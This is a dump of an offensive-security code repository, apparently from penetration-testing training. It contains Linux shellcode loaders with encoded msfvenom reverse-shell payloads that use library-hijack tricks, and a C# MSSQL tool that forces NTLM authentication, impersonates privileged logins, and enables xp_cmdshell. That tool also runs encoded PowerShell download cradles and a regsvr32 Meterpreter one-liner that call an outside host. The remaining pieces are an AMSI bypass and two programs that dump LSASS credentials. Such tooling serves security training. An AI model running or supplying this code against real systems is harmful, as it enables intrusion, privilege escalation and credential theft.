65 | print(f"{bcolors.BOLD}{bcolors.OKGREEN}[+] Encoded payload written to '/tmp/payload.txt' in CSharp format!{bcolors.ENDC}")
66 | else:
67 | print(f"{bcolors.BOLD}{bcolors.OKGREEN}[+] Encoded payload (CSharp):{bcolors.ENDC}")
68 | print(payloadFormatted + "\n")
69 |
70 | # Provide the decoding function for the heck of it
71 | print(f"{bcolors.BOLD}{bcolors.OKBLUE}[i] Decoding function:{bcolors.ENDC}")
72 | if args.type == "xor":
73 | decodingFunc = f"""for (int i = 0; i < buf.Length; i++)
74 | {{
75 | buf[i] = (byte)((uint)buf[i] ^ {hex(args.key)});
76 | }}"""
77 |
78 | if args.type == "rot":
79 | decodingFunc = f"""for (int i = 0; i < buf.Length; i++)
80 | {{
81 | buf[i] = (byte)(((uint)buf[i] - {hex(args.key)}) & 0xFF);
82 | }}"""
83 |
84 | print(decodingFunc)
85 |
--------------------------------------------------------------------------------
/Linux Shellcode Loaders/sharedLibrary_LD_LIBRARY_PATH.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 | #include
6 |
7 | // Compile as follows
8 | //gcc -Wall -fPIC -z execstack -c -o sharedLibrary_LD_LIBRARY_PATH.o sharedLibrary_LD_LIBRARY_PATH.c
9 | //gcc -shared -o sharedLibrary_LD_LIBRARY_PATH.so sharedLibrary_LD_LIBRARY_PATH.o -ldl
10 |
11 | static void runmahpayload() __attribute__((constructor));
12 |
13 | int gpgrt_onclose;
14 | // [...output from readelf here...]
15 | int gpgrt_poll;
16 |
17 | // ROT13-encoded 'linux/x64/shell_reverse_tcp' payload
18 | char buf[] = "\x77\x36\x65\xa6\x77\x0f\x6c\x77\x0e\x6b\x1c\x12\x55\xa4\x55\xc6\x0f\x0d\x0d\x5d\xcd\xb5\x3e\x50\x5e\x55\x96\xf3\x77\x1d\x67\x77\x37\x65\x1c\x12\x77\x10\x6b\x55\x0c\xdb\x77\x2e\x65\x1c\x12\x82\x03\x77\x48\x65\xa6\x55\xc8\x3c\x6f\x76\x7b\x3c\x80\x75\x0d\x60\x55\x96\xf4\x5f\x64\x55\x96\xf3\x1c\x12";
19 |
20 | void runmahpayload() {
21 | setuid(0);
22 | setgid(0);
23 | printf("Library hijacked!\n");
24 | int buf_len = (int) sizeof(buf);
25 | for (int i=0; i
3 | #include
4 | #include
5 | #include
6 | #include
7 |
8 | // To compile:
9 | // gcc -Wall -fPIC -z execstack -c -o sharedLibrary_LD_PRELOAD.o sharedLibrary_LD_PRELOAD.c
10 | // gcc -shared -o sharedLibrary_LD_PRELOAD.so sharedLibrary_LD_PRELOAD.o -ldl
11 |
12 | // msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.49.67 LPORT=80 -f c
13 | unsigned char buf[] =
14 | "\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x48"
15 | "\xb9\x02\x00\x00\x50\xc0\xa8\x31\x43\x51\x48\x89\xe6\x6a\x10"
16 | "\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58"
17 | "\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f"
18 | "\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05";
19 |
20 | uid_t geteuid(void)
21 | {
22 | // Get the address of the original 'geteuid' function
23 | typeof(geteuid) *old_geteuid;
24 | old_geteuid = dlsym(RTLD_NEXT, "geteuid");
25 |
26 | // Fork a new thread based on the current one
27 | if (fork() == 0)
28 | {
29 | // Execute shellcode in the new thread
30 | intptr_t pagesize = sysconf(_SC_PAGESIZE);
31 |
32 | // Make memory executable (required in libs)
33 | if (mprotect((void *)(((intptr_t)buf) & ~(pagesize - 1)), pagesize, PROT_READ|PROT_EXEC)) {
34 | // Handle error
35 | perror("mprotect");
36 | return -1;
37 | }
38 |
39 | // Cast and execute
40 | int (*ret)() = (int(*)())buf;
41 | ret();
42 | }
43 | else
44 | {
45 | // Original thread, call the original function
46 | printf("[Hijacked] Returning from function...\n");
47 | return (*old_geteuid)();
48 | }
49 | // This shouldn't really execute
50 | printf("[Hijacked] Returning from main...\n");
51 | return -2;
52 | }
--------------------------------------------------------------------------------
/Linux Shellcode Loaders/simpleLoader.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 |
5 | // To compile:
6 | // gcc -o simpleLoader simpleLoader.c -z execstack
7 |
8 | // XOR-encoded 'linux/x64/shell_reverse_tcp' payload (key: 0xfa)
9 | unsigned char buf[] = "\x90\xD3\xA2\x63\x90\xF8\xA5\x90\xFB\xA4\xF5\xFF\xB2\x6D\xB2\x43\xF8\xFA\xFA\xAA\x3A\x52\xCB\xB9\xAB\xB2\x73\x1C\x90\xEA\xA0\x90\xD0\xA2\xF5\xFF\x90\xF9\xA4\xB2\x05\x34\x90\xDB\xA2\xF5\xFF\x8F\x0C\x90\xC1\xA2\x63\xB2\x41\xD5\x98\x93\x94\xD5\x89\x92\xFA\xA9\xB2\x73\x1D\xA8\xAD\xB2\x73\x1C\xF5\xFF\xFA";
10 |
11 | int main (int argc, char **argv)
12 | {
13 | int key = 250;
14 | int buf_len = (int) sizeof(buf);
15 |
16 | // Decode the payload
17 | for (int i=0; i
2 | #include
3 | #include
4 |
5 | // To compile:
6 | // gcc simpleXORencoder.c -o simpleXORencoder
7 |
8 | // msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.49.67 LPORT=80 -f c
9 | unsigned char buf[] =
10 | "\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x48"
11 | "\xb9\x02\x00\x00\x50\xc0\xa8\x31\x43\x51\x48\x89\xe6\x6a\x10"
12 | "\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58"
13 | "\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f"
14 | "\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05";
15 |
16 | int main (int argc, char **argv)
17 | {
18 | int key = 250;
19 | int buf_len = (int) sizeof(buf);
20 |
21 | printf("XOR payload (key 0xfa):\n");
22 |
23 | for(int i=0; i
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/MSSQL/MSSQL.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {189219A1-9A2A-4B09-8F69-6207E9996F94}
8 | Exe
9 | MSSQL
10 | MSSQL
11 | v4.7.2
12 | 512
13 | true
14 | true
15 |
16 |
17 | AnyCPU
18 | true
19 | full
20 | false
21 | bin\Debug\
22 | DEBUG;TRACE
23 | prompt
24 | 4
25 |
26 |
27 | AnyCPU
28 | pdbonly
29 | true
30 | bin\Release\
31 | TRACE
32 | prompt
33 | 4
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
--------------------------------------------------------------------------------
/MSSQL/MSSQL.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.30804.86
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "MSSQL", "MSSQL.csproj", "{189219A1-9A2A-4B09-8F69-6207E9996F94}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {189219A1-9A2A-4B09-8F69-6207E9996F94}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {189219A1-9A2A-4B09-8F69-6207E9996F94}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {189219A1-9A2A-4B09-8F69-6207E9996F94}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {189219A1-9A2A-4B09-8F69-6207E9996F94}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {BE43F471-75F0-4066-9D25-9B513A0E3956}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/MSSQL/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Data.SqlClient;
3 |
4 | namespace MSSQL
5 | {
6 | public class Program
7 | {
8 | public static String executeQuery(String query, SqlConnection con)
9 | {
10 | SqlCommand cmd = new SqlCommand(query, con);
11 | SqlDataReader reader = cmd.ExecuteReader();
12 | try
13 | {
14 | String result = "";
15 | while (reader.Read() == true)
16 | {
17 | result += reader[0] + "\n";
18 | }
19 | reader.Close();
20 | return result;
21 | }
22 | catch
23 | {
24 | return "";
25 | }
26 | }
27 |
28 | public static void getGroupMembership(String groupToCheck, SqlConnection con)
29 | {
30 | String res = executeQuery($"SELECT IS_SRVROLEMEMBER('{groupToCheck}');", con);
31 | int role = int.Parse(res);
32 | if (role == 1)
33 | {
34 | Console.WriteLine($"[+] User is a member of the '{groupToCheck}' group.");
35 | }
36 | else
37 | {
38 | Console.WriteLine($"[-] User is not a member of the '{groupToCheck}' group.");
39 | }
40 | }
41 |
42 | public static void Main(string[] args)
43 | {
44 | String serv = "dc01.corp1.com";
45 | String db = "master";
46 | String conStr = $"Server = {serv}; Database = {db}; Integrated Security = True;";
47 | SqlConnection con = new SqlConnection(conStr);
48 |
49 | try
50 | {
51 | con.Open();
52 | Console.WriteLine("[+] Authenticated to MSSQL Server!");
53 | }
54 | catch
55 | {
56 | Console.WriteLine("[-] Authentication failed.");
57 | Environment.Exit(0);
58 | }
59 |
60 | // Enumerate login info
61 | String login = executeQuery("SELECT SYSTEM_USER;", con);
62 | Console.WriteLine($"[*] Logged in as: {login}");
63 | String uname = executeQuery("SELECT USER_NAME();", con);
64 | Console.WriteLine($"[*] Database username: {uname}");
65 | getGroupMembership("public", con);
66 | getGroupMembership("sysadmin", con);
67 |
68 | // Force NTLM authentication for hash-grabbing or relaying
69 | String targetShare = "\\\\192.168.49.67\\share";
70 | String res = executeQuery($"EXEC master..xp_dirtree \"{targetShare}\";", con);
71 | Console.WriteLine($"[*] Forced authentication to '{targetShare}'.");
72 |
73 | // Get logins that we can impersonate
74 | String res = executeQuery("SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'; ", con);
75 | Console.WriteLine($"[*] User can impersonate the following logins: {res}.");
76 |
77 | // Impersonate login and get login information
78 | String su = executeQuery("SELECT SYSTEM_USER;", con);
79 | String un = executeQuery("SELECT USER_NAME();", con);
80 | Console.WriteLine($"[*] Current database login is '{su}' with system user '{un}'.");
81 | String res = executeQuery("EXECUTE AS LOGIN = 'sa';", con);
82 | Console.WriteLine($"[*] Triggered impersonation.");
83 | su = executeQuery("SELECT SYSTEM_USER;", con);
84 | un = executeQuery("SELECT USER_NAME();", con);
85 | Console.WriteLine($"[*] Current database login is '{su}' with system user '{un}'.");
86 |
87 | // Impersonate dbo in trusted database and execute through 'xp_cmdshell'
88 | String res = executeQuery("use msdb; EXECUTE AS USER = 'dbo';", con);
89 | Console.WriteLine("[*] Triggered impersonation.");
90 | res = executeQuery("EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;", con);
91 | Console.WriteLine("[*] Enabled 'xp_cmdshell'.");
92 | String cmd = "powershell -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgA0ADkALgA2ADcALwBjAGgAYQBwAHQAZQByADcALwByAHUAbgAuAHQAeAB0ACcAKQAgAHwAIABJAEUAWAA=";
93 | res = executeQuery($"EXEC xp_cmdshell '{cmd}'", con);
94 | Console.WriteLine($"[*] Executed command! Result: {res}");
95 |
96 | // Impersonate dbo in trusted database and execute through 'sp_OACreate'
97 | String res = executeQuery("use msdb; EXECUTE AS USER = 'dbo';", con);
98 | Console.WriteLine("[*] Triggered impersonation.");
99 | res = executeQuery("EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE;", con);
100 | Console.WriteLine("[*] Enabled OLE automation procedures.");
101 | String cmd = "powershell -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgA0ADkALgA2ADcALwBjAGgAYQBwAHQAZQByADcALwByAHUAbgAuAHQAeAB0ACcAKQAgAHwAIABJAEUAWAA=";
102 | res = executeQuery($"DECLARE @myshell INT; EXEC sp_oacreate 'wscript.shell', @myshell OUTPUT; EXEC sp_oamethod @myshell, 'run', null, '{cmd}';", con);
103 | Console.WriteLine($"[*] Executed command!");
104 |
105 | //
106 | // Execution via loading custom assemblies is also possible, but for brevity not included here
107 | //
108 |
109 | // Enumerate linked servers
110 | String res = executeQuery("EXEC sp_linkedservers;", con);
111 | Console.WriteLine($"[*] Found linked servers: {res}");
112 |
113 | // Execute on linked server
114 | String res = executeQuery("EXEC ('sp_configure ''show advanced options'', 1; reconfigure;') AT DC01;", con);
115 | Console.WriteLine($"[*] Enabled advanced options on DC01.");
116 | res = executeQuery("EXEC ('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT DC01;", con);
117 | Console.WriteLine($"[*] Enabled xp_cmdshell option on DC01.");
118 | res = executeQuery("EXEC ('xp_cmdshell ''whoami'';') AT DC01;", con);
119 | Console.WriteLine($"[*] Triggered command. Result: {res}");
120 |
121 | // Execute on linked server via 'openquery'
122 | String res = executeQuery("select 1 from openquery(\"dc01\", 'select 1; EXEC sp_configure ''show advanced options'', 1; reconfigure')", con);
123 | Console.WriteLine($"[*] Enabled advanced options on DC01.");
124 | res = executeQuery("select 1 from openquery(\"dc01\", 'select 1; EXEC sp_configure ''xp_cmdshell'', 1; reconfigure')", con);
125 | Console.WriteLine($"[*] Enabled xp_cmdshell options on DC01.");
126 | res = executeQuery("select 1 from openquery(\"dc01\", 'select 1; exec xp_cmdshell ''regsvr32 /s /n /u /i:http://192.168.49.67:8080/F0t6R5A.sct scrobj.dll''')", con);
127 | Console.WriteLine($"[*] Triggered Meterpreter oneliner on DC01. Check your listener!");
128 |
129 | // Escalate via double database linkedString su = executeQuery("SELECT SYSTEM_USER;", con);
130 | Console.WriteLine($"[*] Current system user is '{su}' in database 'appsrv01'.");
131 | su = executeQuery("select mylogin from openquery(\"dc01\", 'select SYSTEM_USER as mylogin');", con);
132 | Console.WriteLine($"[*] Current system user is '{su}' in database 'dc01' via 1 link.");
133 | su = executeQuery("select mylogin from openquery(\"dc01\", 'select mylogin from openquery(\"appsrv01\", ''select SYSTEM_USER as mylogin'')');", con);
134 | Console.WriteLine($"[*] Current system user is '{su}' in database 'appsrv01' via 2 links.");
135 | }
136 | }
137 | }
--------------------------------------------------------------------------------
/MSSQL/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("MSSQL")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("MSSQL")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("189219a1-9a2a-4b09-8f69-6207e9996f94")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/MiniDump/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/MiniDump/MiniDump.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {595D5812-AA30-4EDE-95DA-8EDD7B8844BD}
8 | Exe
9 | MiniDump
10 | MiniDump
11 | v4.7.2
12 | 512
13 | true
14 | true
15 |
16 |
17 | AnyCPU
18 | true
19 | full
20 | false
21 | bin\Debug\
22 | DEBUG;TRACE
23 | prompt
24 | 4
25 |
26 |
27 | AnyCPU
28 | pdbonly
29 | true
30 | bin\Release\
31 | TRACE
32 | prompt
33 | 4
34 |
35 |
36 | true
37 | bin\x64\Debug\
38 | DEBUG;TRACE
39 | full
40 | x64
41 | 7.3
42 | prompt
43 | true
44 |
45 |
46 | bin\x64\Release\
47 | TRACE
48 | true
49 | pdbonly
50 | x64
51 | 7.3
52 | prompt
53 | true
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
--------------------------------------------------------------------------------
/MiniDump/MiniDump.ps1:
--------------------------------------------------------------------------------
1 | # Bypass AMSI because we're cool
2 | [Ref].Assembly.GetType('System.Management.Automation.Amsi'+[char]85+'tils').GetField('ams'+[char]105+'InitFailed','NonPublic,Static').SetValue($null,$true)
3 |
4 | # Utility functions
5 | function LookupFunc {
6 | Param ($moduleName, $functionName)
7 | $assem = ([AppDomain]::CurrentDomain.GetAssemblies() |
8 | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].
9 | Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
10 | $tmp=@()
11 | $assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}}
12 | return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null,
13 | @($moduleName)), $functionName))
14 | }
15 |
16 | function getDelegateType {
17 | Param (
18 | [Parameter(Position = 0, Mandatory = $True)] [Type[]] $func,
19 | [Parameter(Position = 1)] [Type] $delType = [Void]
20 | )
21 | $type = [AppDomain]::CurrentDomain.
22 | DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),
23 | [System.Reflection.Emit.AssemblyBuilderAccess]::Run).
24 | DefineDynamicModule('InMemoryModule', $false).
25 | DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass',
26 | [System.MulticastDelegate])
27 | $type.
28 | DefineConstructor('RTSpecialName, HideBySig, Public',
29 | [System.Reflection.CallingConventions]::Standard, $func).
30 | SetImplementationFlags('Runtime, Managed')
31 | $type.
32 | DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func).
33 | SetImplementationFlags('Runtime, Managed')
34 | return $type.CreateType()
35 | }
36 |
37 | # Add dbghelp.dll and reflectively load the function while we're at it
38 | # (somehow dbghelp.dll doesn't play nice with LookupFunc)
39 | $MethodDefinition = @'
40 | [DllImport("DbgHelp.dll", CharSet = CharSet.Unicode)]
41 | public static extern bool MiniDumpWriteDump(
42 | IntPtr hProcess,
43 | uint processId,
44 | IntPtr hFile,
45 | uint dumpType,
46 | IntPtr expParam,
47 | IntPtr userStreamParam,
48 | IntPtr callbackParam
49 | );
50 | '@
51 | $dbghelp = Add-Type -MemberDefinition $MethodDefinition -Name 'dbghelp' -Namespace 'Win32' -PassThru
52 |
53 | # Get LSASS PID
54 | $lsassPid = Get-Process lsass | select -ExpandProperty Id
55 | Write-Host("Got lsass.exe PID: $lsassPid.")
56 |
57 | # Get a handle on LSASS
58 | $handle = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll OpenProcess),
59 | (getDelegateType @([UInt32], [Bool], [Int])([IntPtr]))).Invoke(0x1F0FFF,$false,$lsassPid)
60 | Write-Host("Got handle on LSASS: $handle.")
61 |
62 | # Dump process memory to file
63 | $filePath = "C:\Windows\Tasks\lsass.dmp"
64 | $dumpFile = New-Object IO.FileStream $filePath,'Create','Write','Read'
65 | $result = $dbghelp::MiniDumpWriteDump($handle, $lsassPid, $dumpFile.Handle, 2, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero)
66 | $dumpFile.Close()
67 |
68 | if($result) {
69 | Write-Host("Dumped LSASS memory to $filePath.")
70 | }else {
71 | Write-Host("Error dumping LSASS memory.")
72 | }
--------------------------------------------------------------------------------
/MiniDump/MiniDump.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.30804.86
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "MiniDump", "MiniDump.csproj", "{595D5812-AA30-4EDE-95DA-8EDD7B8844BD}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Debug|x64 = Debug|x64
12 | Release|Any CPU = Release|Any CPU
13 | Release|x64 = Release|x64
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {595D5812-AA30-4EDE-95DA-8EDD7B8844BD}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
17 | {595D5812-AA30-4EDE-95DA-8EDD7B8844BD}.Debug|Any CPU.Build.0 = Debug|Any CPU
18 | {595D5812-AA30-4EDE-95DA-8EDD7B8844BD}.Debug|x64.ActiveCfg = Debug|x64
19 | {595D5812-AA30-4EDE-95DA-8EDD7B8844BD}.Debug|x64.Build.0 = Debug|x64
20 | {595D5812-AA30-4EDE-95DA-8EDD7B8844BD}.Release|Any CPU.ActiveCfg = Release|Any CPU
21 | {595D5812-AA30-4EDE-95DA-8EDD7B8844BD}.Release|Any CPU.Build.0 = Release|Any CPU
22 | {595D5812-AA30-4EDE-95DA-8EDD7B8844BD}.Release|x64.ActiveCfg = Release|x64
23 | {595D5812-AA30-4EDE-95DA-8EDD7B8844BD}.Release|x64.Build.0 = Release|x64
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {32D0848B-922D-49BC-8B90-2F98D24BA0DD}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/MiniDump/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Diagnostics;
3 | using System.IO;
4 | using System.Runtime.InteropServices;
5 |
6 | namespace MiniDump
7 | {
8 | public class Program
9 | {
10 | static int MiniDumpWithFullMemory = 2;
11 | static UInt32 PROCESS_ALL_ACCESS = 0x001F0FFF;
12 |
13 | [DllImport("Dbghelp.dll")]
14 | static extern bool MiniDumpWriteDump(IntPtr hProcess, int ProcessId, IntPtr hFile, int DumpType, IntPtr ExceptionParam, IntPtr UserStreamParam, IntPtr CallbackParam);
15 |
16 | [DllImport("kernel32.dll")]
17 | static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int processId);
18 |
19 | public static void Main(string[] args)
20 | {
21 | // Get the PID of lsass.exe
22 | Process[] lsass = Process.GetProcessesByName("lsass");
23 | int lsass_pid = lsass[0].Id;
24 | Console.WriteLine($"Got lsass.exe PID: {lsass_pid}.");
25 |
26 | // Get a handle on LSASS
27 | IntPtr handle = OpenProcess(PROCESS_ALL_ACCESS, false, lsass_pid);
28 | Console.WriteLine($"Got a handle on lsass.exe: {handle}.");
29 |
30 | // Dump LSASS process to file
31 | string filePath = "C:\\Windows\\tasks\\lsass.dmp";
32 | FileStream dumpFile = new FileStream(filePath, FileMode.Create);
33 | bool dumped = MiniDumpWriteDump(handle, lsass_pid, dumpFile.SafeFileHandle.DangerousGetHandle(), MiniDumpWithFullMemory, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero);
34 | if (dumped)
35 | {
36 | Console.WriteLine($"Dumped LSASS memory to {filePath}.");
37 | }
38 | else
39 | {
40 | Console.WriteLine($"Error dumping LSASS memory: {Marshal.GetLastWin32Error()}");
41 | }
42 | }
43 | }
44 | }
--------------------------------------------------------------------------------
/MiniDump/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("MiniDump")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("MiniDump")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("595d5812-aa30-4ede-95da-8edd7b8844bd")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/PrintSpoofer.NET/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/PrintSpoofer.NET/PrintSpoofer.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {C91C8B29-82DF-49C0-986B-81182CF84E42}
8 | Exe
9 | PrintSpoofer
10 | PrintSpoofer
11 | v4.7.2
12 | 512
13 | true
14 | true
15 |
16 |
17 | AnyCPU
18 | true
19 | full
20 | false
21 | bin\Debug\
22 | DEBUG;TRACE
23 | prompt
24 | 4
25 |
26 |
27 | AnyCPU
28 | pdbonly
29 | true
30 | bin\Release\
31 | TRACE
32 | prompt
33 | 4
34 |
35 |
36 | true
37 | bin\x64\Debug\
38 | DEBUG;TRACE
39 | full
40 | x64
41 | 7.3
42 | prompt
43 | true
44 |
45 |
46 | bin\x64\Release\
47 | TRACE
48 | true
49 | pdbonly
50 | x64
51 | 7.3
52 | prompt
53 | true
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
--------------------------------------------------------------------------------
/PrintSpoofer.NET/PrintSpoofer.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.30804.86
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "PrintSpoofer", "PrintSpoofer.csproj", "{C91C8B29-82DF-49C0-986B-81182CF84E42}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Debug|x64 = Debug|x64
12 | Release|Any CPU = Release|Any CPU
13 | Release|x64 = Release|x64
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {C91C8B29-82DF-49C0-986B-81182CF84E42}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
17 | {C91C8B29-82DF-49C0-986B-81182CF84E42}.Debug|Any CPU.Build.0 = Debug|Any CPU
18 | {C91C8B29-82DF-49C0-986B-81182CF84E42}.Debug|x64.ActiveCfg = Debug|x64
19 | {C91C8B29-82DF-49C0-986B-81182CF84E42}.Debug|x64.Build.0 = Debug|x64
20 | {C91C8B29-82DF-49C0-986B-81182CF84E42}.Release|Any CPU.ActiveCfg = Release|Any CPU
21 | {C91C8B29-82DF-49C0-986B-81182CF84E42}.Release|Any CPU.Build.0 = Release|Any CPU
22 | {C91C8B29-82DF-49C0-986B-81182CF84E42}.Release|x64.ActiveCfg = Release|x64
23 | {C91C8B29-82DF-49C0-986B-81182CF84E42}.Release|x64.Build.0 = Release|x64
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
